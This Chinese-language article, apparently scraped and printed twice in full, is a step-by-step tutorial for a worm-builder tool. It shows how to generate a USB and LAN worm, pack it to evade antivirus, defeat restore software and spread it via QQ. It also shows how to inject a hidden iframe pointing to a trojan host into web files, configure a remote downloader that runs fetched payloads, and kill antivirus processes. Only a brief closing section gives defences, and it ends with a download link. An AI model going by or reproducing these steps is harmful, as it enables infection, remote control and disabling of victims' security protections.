论文部分内容阅读
超强U盘蠕虫病毒制造机
“马戏下载者2007”是一个非常强悍的U盘蠕虫病毒制造工具,除了具备U盘、移动硬盘等移动存储感染传播功能外,还具有蠕虫的特性。马戏下载者2007可像蠕虫病毒一样,在局域网中自动感染传播,只要有一台电脑中了此病毒,那么整个局域网将无一幸免。更有意思的是,马戏下载者2007不仅会自动感染EXE文件,还可以网页木马的方式,感染隐藏在HTM、ASP、HTML、PHP等网页文件中!这就让马戏下载者2007反复再生死灰复燃。更难以彻底清除。
病毒基体——U盘感染
首先,我们要生成一个基本的U盘感染型病毒。运行马戏下载者2007,勾选界面“VIP功能”中的“U盘传播”项,点击“生成”按钮,指定文件保存路径,即可生成一个最基本的U盘感染性病毒木马了。为了防止木马被杀毒软件查杀,可以勾选“超强保护”项,使生成的病毒木马自动加上一个特殊壳,以躲过一些杀软的检测。而且采用超强保护功能后,病毒木马进程会采用双进程自动保护,并在系统中添加多个启动项目,以确保不被完全查杀清除掉。
超强蠕虫,共享还原不放过
有了超强保护功能还不够,现在我们要为病毒加上蠕虫功能。在马戏下载者2007设置界面中。勾选“共享传播”项,即可实现蠕虫功能。在普通的局域网中,往往默认开放了IPC$,提供了文件夹共享功能。使用病毒的“共享传播”功能后,病毒将会自动搜索整个局域网中所有电脑的共享资源。将自身复制到共享文件夹中,并采用自动播放功能感染该电脑,一台也不放过!
有许多公司或网吧中的电脑,都使用了还原精灵之类的工具,一旦进行系统恢复,蠕虫病毒就被清除了。不过马戏下载者2007提供了还原转存功能,让病毒木马可以穿透还原精灵,勾选界面中的“还原转存”项,即可启用该功能让还原精灵失效。
锁定IE,尾巴跟定你
想要宣传某个广告网页,或者网页挂马,那么可以锁定IE浏览器的首页。勾选马戏下载者2007设置界面中的“锁定IE”项,在后面输入要锁定的IE网页链接即可。
木马病毒传播的途径,当然不只有U盘或局域网蠕虫几种,QQ尾巴传播也是木马病毒采用的有效手段之一。勾选“QQ尾巴内容设置”项。在后面输入要设置的QQ尾巴内容文字和网页木马链接,即可感染中毒电脑上的QQ,让其自动发送QQ尾巴宣传广告或病毒木马地址内容。
另类感染,网页中能藏身
一旦刚才制作的病毒被发现,那么肯定是杀无赦的。如何才能躲过杀毒软件的查杀呢?有许多电脑上都保存有从网上下载的一些网页资料,将病毒木马隐藏在网页中,即使系统中其它的病毒都统统被清除掉了,只要使用者打开电脑上的某个网页文件,就会重新再次感染病毒!
首先,我们需要制作一个网页木马,具体方法这里不多讲,以前有过很多这方面的介绍了。假设网页木马地址为“http://www.muma.com/muma.html”,可将网页木马地址加入如下语句中:
(iframe src=“http://www.muma.com/muma.html”name=“0”width=“0”height:“0”ffameborder=“0”)
在实际使用中,修改其中的木马网页地址即可。然后在马戏下载者2007界面中勾选“感染ASP”、“感染HTM”、“感染PHP”、“感染HTML”、“感染ASPX”几项,在下方的“感染代码”中输入上面的代码语句。生成的木马病毒,在运行即会自动感染所有的网页文件。在网页文件中添加上面的代码语句。当然,也别忘记勾选“感染EXE”项,让木马病毒自动感染EXE可执行程序。
一变多,下载者功能
在马戏下载者2007中还提供了“下载者”功能。可控制被感染的电脑下载任意的木马。与普通下载者不同的是,马戏下载者2007配置下载者时,不必直接指定多个木马网址,而是可以指定一个包含所有木马网址的文本链接,通过更新文本就可更换下载新的木马,特别适合于更换或更新被感染主机上的木马服务端程序。
首先,我们可以用记事本编写一个文本文件。假设文件名为“xiazai.txt”。将木马网址链接按一行一个的格式输入其中,保存文本并上传到某个网站空间中。得到其链接地址。假设这里链接地址为“http://www.muma.com/xiazai.txt”。在马戏下载者2007中的“无限下载者设置”处,输入前面的链接地址,点击“保存”按钮。生成的木马就会自动下载并运行文本中指定的木马文件了。以后要更换下载木马时,可以直接修改“xiazai.txt”文本中的链接地址就可以了。
反杀病毒软件
现在的木马病毒清除工具还是很厉害的,要想保住木马病毒,最直接的办法就是干掉杀毒软件和反病毒工具。马戏下载者2007中提供了进程结束功能,在“结束进程”中直接输入杀毒软件的进程名。例如要反杀卡巴斯基,那么可输入“avp.exe”;要禁止主机上运行360安全卫士,那么可输入“360Safe.exe”。多个进程名之间用英文半角“。”号隔开。
别让马戏下载者2007进了你的门
从上面的介绍,可以看出马戏下载者2007这类U盘蠕虫病毒是非常可怕的。它采用了局域网蠕虫感染、U盘感染、自动播放感染、QQ感染、网页文件和下载者感染等多种方式,只要一旦中了这类木马病毒,那么就很难清除掉,就算重装系统也会被重复感染。如何防范这类病毒呢?除了一般通用的病毒防范与查杀手段外。还需要注意以下几点:
首先,要关闭系统中的自动播放功能、局域网共享功能。这样可防止U盘感染及局域网蠕虫感染。其次,在使用杀毒软件查杀系统时,一定要选择全面查杀,不光检测系统盘,其它数据盘也不能放过。而且在查杀系统时,应该选择查杀所有类型的文件,不要漏掉网页文件。另外,即使系统上安装了还原精灵之类的即时还原工具,也不能大意,还原系统后最好也再进行一次全面的病毒查杀,以防病毒穿透了还原工具。
下载链接:http://blog.sina.com.cn/u/42ccdOe3010008cc
“马戏下载者2007”是一个非常强悍的U盘蠕虫病毒制造工具,除了具备U盘、移动硬盘等移动存储感染传播功能外,还具有蠕虫的特性。马戏下载者2007可像蠕虫病毒一样,在局域网中自动感染传播,只要有一台电脑中了此病毒,那么整个局域网将无一幸免。更有意思的是,马戏下载者2007不仅会自动感染EXE文件,还可以网页木马的方式,感染隐藏在HTM、ASP、HTML、PHP等网页文件中!这就让马戏下载者2007反复再生死灰复燃。更难以彻底清除。
病毒基体——U盘感染
首先,我们要生成一个基本的U盘感染型病毒。运行马戏下载者2007,勾选界面“VIP功能”中的“U盘传播”项,点击“生成”按钮,指定文件保存路径,即可生成一个最基本的U盘感染性病毒木马了。为了防止木马被杀毒软件查杀,可以勾选“超强保护”项,使生成的病毒木马自动加上一个特殊壳,以躲过一些杀软的检测。而且采用超强保护功能后,病毒木马进程会采用双进程自动保护,并在系统中添加多个启动项目,以确保不被完全查杀清除掉。
超强蠕虫,共享还原不放过
有了超强保护功能还不够,现在我们要为病毒加上蠕虫功能。在马戏下载者2007设置界面中。勾选“共享传播”项,即可实现蠕虫功能。在普通的局域网中,往往默认开放了IPC$,提供了文件夹共享功能。使用病毒的“共享传播”功能后,病毒将会自动搜索整个局域网中所有电脑的共享资源。将自身复制到共享文件夹中,并采用自动播放功能感染该电脑,一台也不放过!
有许多公司或网吧中的电脑,都使用了还原精灵之类的工具,一旦进行系统恢复,蠕虫病毒就被清除了。不过马戏下载者2007提供了还原转存功能,让病毒木马可以穿透还原精灵,勾选界面中的“还原转存”项,即可启用该功能让还原精灵失效。
锁定IE,尾巴跟定你
想要宣传某个广告网页,或者网页挂马,那么可以锁定IE浏览器的首页。勾选马戏下载者2007设置界面中的“锁定IE”项,在后面输入要锁定的IE网页链接即可。
木马病毒传播的途径,当然不只有U盘或局域网蠕虫几种,QQ尾巴传播也是木马病毒采用的有效手段之一。勾选“QQ尾巴内容设置”项。在后面输入要设置的QQ尾巴内容文字和网页木马链接,即可感染中毒电脑上的QQ,让其自动发送QQ尾巴宣传广告或病毒木马地址内容。
另类感染,网页中能藏身
一旦刚才制作的病毒被发现,那么肯定是杀无赦的。如何才能躲过杀毒软件的查杀呢?有许多电脑上都保存有从网上下载的一些网页资料,将病毒木马隐藏在网页中,即使系统中其它的病毒都统统被清除掉了,只要使用者打开电脑上的某个网页文件,就会重新再次感染病毒!
首先,我们需要制作一个网页木马,具体方法这里不多讲,以前有过很多这方面的介绍了。假设网页木马地址为“http://www.muma.com/muma.html”,可将网页木马地址加入如下语句中:
(iframe src=“http://www.muma.com/muma.html”name=“0”width=“0”height:“0”ffameborder=“0”)
在实际使用中,修改其中的木马网页地址即可。然后在马戏下载者2007界面中勾选“感染ASP”、“感染HTM”、“感染PHP”、“感染HTML”、“感染ASPX”几项,在下方的“感染代码”中输入上面的代码语句。生成的木马病毒,在运行即会自动感染所有的网页文件。在网页文件中添加上面的代码语句。当然,也别忘记勾选“感染EXE”项,让木马病毒自动感染EXE可执行程序。
一变多,下载者功能
在马戏下载者2007中还提供了“下载者”功能。可控制被感染的电脑下载任意的木马。与普通下载者不同的是,马戏下载者2007配置下载者时,不必直接指定多个木马网址,而是可以指定一个包含所有木马网址的文本链接,通过更新文本就可更换下载新的木马,特别适合于更换或更新被感染主机上的木马服务端程序。
首先,我们可以用记事本编写一个文本文件。假设文件名为“xiazai.txt”。将木马网址链接按一行一个的格式输入其中,保存文本并上传到某个网站空间中。得到其链接地址。假设这里链接地址为“http://www.muma.com/xiazai.txt”。在马戏下载者2007中的“无限下载者设置”处,输入前面的链接地址,点击“保存”按钮。生成的木马就会自动下载并运行文本中指定的木马文件了。以后要更换下载木马时,可以直接修改“xiazai.txt”文本中的链接地址就可以了。
反杀病毒软件
现在的木马病毒清除工具还是很厉害的,要想保住木马病毒,最直接的办法就是干掉杀毒软件和反病毒工具。马戏下载者2007中提供了进程结束功能,在“结束进程”中直接输入杀毒软件的进程名。例如要反杀卡巴斯基,那么可输入“avp.exe”;要禁止主机上运行360安全卫士,那么可输入“360Safe.exe”。多个进程名之间用英文半角“。”号隔开。
别让马戏下载者2007进了你的门
从上面的介绍,可以看出马戏下载者2007这类U盘蠕虫病毒是非常可怕的。它采用了局域网蠕虫感染、U盘感染、自动播放感染、QQ感染、网页文件和下载者感染等多种方式,只要一旦中了这类木马病毒,那么就很难清除掉,就算重装系统也会被重复感染。如何防范这类病毒呢?除了一般通用的病毒防范与查杀手段外。还需要注意以下几点:
首先,要关闭系统中的自动播放功能、局域网共享功能。这样可防止U盘感染及局域网蠕虫感染。其次,在使用杀毒软件查杀系统时,一定要选择全面查杀,不光检测系统盘,其它数据盘也不能放过。而且在查杀系统时,应该选择查杀所有类型的文件,不要漏掉网页文件。另外,即使系统上安装了还原精灵之类的即时还原工具,也不能大意,还原系统后最好也再进行一次全面的病毒查杀,以防病毒穿透了还原工具。
下载链接:http://blog.sina.com.cn/u/42ccdOe3010008cc